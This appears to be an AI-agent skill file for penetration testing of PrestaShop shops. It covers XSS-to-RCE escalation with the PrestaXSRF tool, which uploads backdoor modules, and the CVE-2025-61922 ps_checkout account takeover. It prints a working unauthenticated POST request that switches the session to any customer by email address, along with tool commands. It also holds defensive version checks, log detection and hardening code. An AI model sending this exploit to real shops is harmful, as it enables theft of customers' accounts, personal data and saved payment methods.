Hacktricks-skills prestashop-pentest

How to exploit PrestaShop vulnerabilities including XSS-to-RCE escalation and account takeover attacks. Use this skill whenever the user mentions PrestaShop, e-commerce security testing, PrestaXSRF, CVE-2025-61922, ps_checkout module vulnerabilities, or needs to test PrestaShop installations for security issues. This skill covers exploitation techniques for PrestaShop 8.X.X and 1.7.X.X versions.

Install: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/network-services-pentesting/pentesting-web/prestashop/SKILL.MD

PrestaShop Pentesting

A skill for testing PrestaShop e-commerce installations for security vulnerabilities, including XSS-to-RCE escalation and account takeover attacks.

When to Use This Skill

Use this skill when:

  • Testing a PrestaShop installation for vulnerabilities
  • You have found XSS in a PrestaShop site and want to escalate to RCE
  • Testing the ps_checkout module for CVE-2025-61922
  • Analyzing PrestaShop 8.X.X or 1.7.X.X versions
  • You need to understand PrestaShop exploitation techniques

Vulnerability Coverage

1. XSS to RCE Escalation (PrestaXSRF)

The PrestaXSRF tool allows escalation from XSS to RCE or other critical vulnerabilities in PrestaShop.

Supported Versions:

  • PrestaShop 8.X.X
  • PrestaShop 1.7.X.X

Capabilities:

  • Upload custom modules (persistent backdoors)
  • RCE via the PSUploadModule() function
  • Other critical vulnerability exploitation

Tool: PrestaXSRF

Usage:

# Clone the tool
git clone https://github.com/nowak0x01/PrestaXSRF
cd PrestaXSRF

# Run against target
python3 prestaxsrf.py -u <target_url> -x <xss_payload>

Research: PrestaXSRF Technical Analysis

2. CVE-2025-61922: ps_checkout Account Takeover

Vulnerability: Missing identity validation in ps_checkout module versions < 5.0.5 allows unauthenticated attackers to switch their session to any customer by supplying that customer's email address.

Affected Component: ps_checkout module < 5.0.5

Attack Vector:

  • Endpoint: POST /module/ps_checkout/ExpressCheckout
  • Authentication: None required (unauthenticated)
  • Impact: Account takeover, PII access, purchases with saved payment methods

Technical Details:

The vulnerability exists because:

  1. ExpressCheckout.php accepts attacker-controlled JSON and validates only orderID
  2. It builds an ExpressCheckoutRequest and calls ExpressCheckoutAction::execute()
  3. In vulnerable versions, when no user is logged in, CustomerAuthenticationAction::execute() is called
  4. That method only checks customerExists(<payer_email>) and then calls context->updateCustomer(new Customer($id))
  5. Result: email existence == login (no password or token verification)
  6. The attacker controls order.payer.email_address in the JSON payload

Exploitation Steps:

  1. Reconnaissance: Collect any registered customer email address (admin accounts are separate and not affected)

  2. Exploitation: Send an unauthenticated POST request to the controller with orderID and the victim email in order.payer.email_address

  3. Session Hijack: Even if the endpoint returns HTTP 500, the response will include cookies for the victim's customer context (session already switched)

  4. Post-Exploitation: Access PII, view order history, or make purchases with saved payment methods

Exploit Request:

POST /module/ps_checkout/ExpressCheckout HTTP/1.1
Host: <target>
Content-Type: application/json
Content-Length: 72

{"orderID":"1","order":{"payer":{"email_address":"victim@example.com"}}}

Detection:

Check whether the ps_checkout module is installed and which version it runs:

# Check module version in source code
curl -s https://<target>/module/ps_checkout/ | grep -i "version"

# Or check via API if available
curl -s https://<target>/api/modules/ps_checkout
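Two defender-side checks that belong with this step, as an added example that is not part of the skill, of PrestaXSRF or of the ps_checkout module: a numeric comparison of a detected version against the fixed release 5.0.5 (a plain string comparison would wrongly treat 5.0.10 as older than 5.0.5), and a pass over web server access logs that flags clients whose POSTs to the ExpressCheckout controller match the pattern described above, namely 5xx responses on that endpoint (the session switch happens even when the controller then fails) or repeated POSTs that look like probing of customer emails. The log lines are constructed sample data in Apache combined format; the addresses, timestamps and the threshold of three requests are assumptions.

```python
import re
from collections import Counter

# ps_checkout release that fixes CVE-2025-61922 (from the advisory text above)
FIXED_VERSION = (5, 0, 5)
# controller path of the vulnerable endpoint (from the advisory text above)
TARGET_PATH = "/module/ps_checkout/ExpressCheckout"


def parse_version(text):
    """Reduce a version string such as '5.0.5' or 'v5.0.10-beta1' to a
    3-tuple of ints so that versions compare numerically, not lexically."""
    numbers = [int(n) for n in re.findall(r"\d+", text)[:3]]
    if not numbers:
        raise ValueError(f"no numeric version in {text!r}")
    numbers += [0] * (3 - len(numbers))
    return tuple(numbers)


def is_vulnerable_version(text):
    """True when the detected ps_checkout version is older than 5.0.5."""
    return parse_version(text) < FIXED_VERSION


# Combined log format: client, identd, user, [time], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log (RFC 5737 documentation addresses, invented timestamps).
SAMPLE_LOG = """\
203.0.113.10 - - [12/Jan/2026:10:00:01 +0000] "GET /index.php?controller=product&id_product=3 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Jan/2026:10:00:05 +0000] "POST /module/ps_checkout/ExpressCheckout HTTP/1.1" 500 412 "-" "python-requests/2.31"
198.51.100.7 - - [12/Jan/2026:10:00:06 +0000] "POST /module/ps_checkout/ExpressCheckout HTTP/1.1" 500 412 "-" "python-requests/2.31"
198.51.100.7 - - [12/Jan/2026:10:00:07 +0000] "POST /module/ps_checkout/ExpressCheckout HTTP/1.1" 500 412 "-" "python-requests/2.31"
203.0.113.10 - - [12/Jan/2026:10:01:00 +0000] "POST /module/ps_checkout/ExpressCheckout HTTP/1.1" 200 301 "https://shop.example/checkout" "Mozilla/5.0"
"""


def find_suspicious_sources(log_text, threshold=3):
    """Return {client_ip: [reasons]} for clients whose traffic to the ExpressCheckout
    controller matches the abuse pattern: 5xx responses on that endpoint (the session
    switch happens even when the controller then fails) or at least `threshold`
    POSTs, which is what probing many customer emails looks like."""
    posts, errors = Counter(), Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != TARGET_PATH:
            continue
        posts[m["ip"]] += 1
        if m["status"].startswith("5"):
            errors[m["ip"]] += 1

    findings = {}
    for ip, count in posts.items():
        reasons = []
        if errors[ip]:
            reasons.append(f"{errors[ip]} server error(s) on {TARGET_PATH}")
        if count >= threshold:
            reasons.append(f"{count} POSTs to {TARGET_PATH} (possible email enumeration)")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for v in ("5.0.4", "5.0.5", "5.0.10"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "fixed")
    for ip, reasons in find_suspicious_sources(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

The log heuristic is deliberately coarse: a legitimate shopper also POSTs to this controller, so a single 200 from a browser session is not flagged, while a burst of POSTs ending in 500 from one client is exactly what the exploitation steps above produce.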

Mitigation:

  • Update the ps_checkout module to version 5.0.5 or later
  • Implement proper identity validation in ExpressCheckout flow
  • Add CSRF tokens to sensitive endpoints
  • Validate session state before allowing account actions
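To make the identity-validation point concrete, here is an added example (not code from the skill, from PrestaShop or from the ps_checkout module) that models the controller flow described under Technical Details in Python and puts the hardened form beside it. The customer table, the Context class, the session token and the numeric return codes are constructed stand-ins for PrestaShop's database, request context and HTTP responses; only the decision logic is meant to correspond to the description above, and the guest path is simplified to "proceed without a customer context".

```python
import hmac
from dataclasses import dataclass
from typing import Optional

# Constructed stand-in for the customer table the real module queries.
CUSTOMERS = {"alice@example.com": 7, "bob@example.com": 12}


@dataclass
class Context:
    """Minimal stand-in for PrestaShop's request context (assumption: just the
    two fields this example needs). customer_id None means nobody is logged in."""
    customer_id: Optional[int] = None
    session_token: Optional[str] = None  # hypothetical per-session CSRF token


def customer_exists(email):
    return email in CUSTOMERS


def payer_email(payload):
    """order.payer.email_address from the caller-supplied JSON."""
    return payload.get("order", {}).get("payer", {}).get("email_address")


def vulnerable_express_checkout(ctx, payload):
    """The pre-5.0.5 logic as described above: only orderID is validated, and with
    no user logged in the context is switched to whichever customer owns the
    supplied email. Email existence is treated as login."""
    if "orderID" not in payload:
        return 400
    email = payer_email(payload)
    if ctx.customer_id is None and email and customer_exists(email):
        ctx.customer_id = CUSTOMERS[email]   # session switch on an unverified email
    return 200


def hardened_express_checkout(ctx, payload, request_token):
    """Hardened form implementing the three mitigations listed above: validate the
    session state first, require a token bound to that session, and accept the
    payer email only when it names the customer who is already authenticated.
    The request can never create or change a customer context."""
    if "orderID" not in payload:
        return 400
    if ctx.customer_id is None:
        # Guest flow: proceed without a customer context; never promote the
        # request to a customer session on the strength of an email address.
        return 200
    if not request_token or not ctx.session_token or \
            not hmac.compare_digest(request_token, ctx.session_token):
        return 403                      # missing or foreign CSRF token
    email = payer_email(payload)
    if email and CUSTOMERS.get(email) != ctx.customer_id:
        return 403                      # payer email must be the logged-in customer's
    return 200


if __name__ == "__main__":
    request = {"orderID": "1", "order": {"payer": {"email_address": "alice@example.com"}}}
    ctx = Context()
    print(vulnerable_express_checkout(ctx, request), "customer_id =", ctx.customer_id)
    ctx = Context()
    print(hardened_express_checkout(ctx, request, None), "customer_id =", ctx.customer_id)
```

The design choice worth noting is that the hardened handler treats the payer email as data to be checked against the session, never as a key to select the session; that single inversion is what removes the "email existence == login" condition.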

Testing Workflow

Step 1: Identify PrestaShop Version

# Check version from source
curl -s https://<target> | grep -i "prestashop"

# Check via robots.txt
curl -s https://<target>/robots.txt

# Check via sitemap
curl -s https://<target>/sitemap.xml

Step 2: Check for ps_checkout Module

# Check if module exists
curl -s https://<target>/module/ps_checkout/

# Check module version
curl -s https://<target>/module/ps_checkout/ExpressCheckout.php | head -20

Step 3: Test for CVE-2025-61922

Use the provided script test_ps_checkout.py to test for the vulnerability:

python3 scripts/test_ps_checkout.py --target https://<target> --email victim@example.com

Step 4: If XSS Found, Escalate with PrestaXSRF

If you've identified XSS vulnerabilities:

# Use PrestaXSRF to escalate
python3 scripts/run_prestaxsrf.py --target https://<target> --xss-payload "<script>alert(1)</script>"

Safety and Ethics

  • Only test systems you have explicit authorization to test
  • Document all findings for remediation
  • Report vulnerabilities responsibly to site owners
  • Do not use these techniques for unauthorized access

References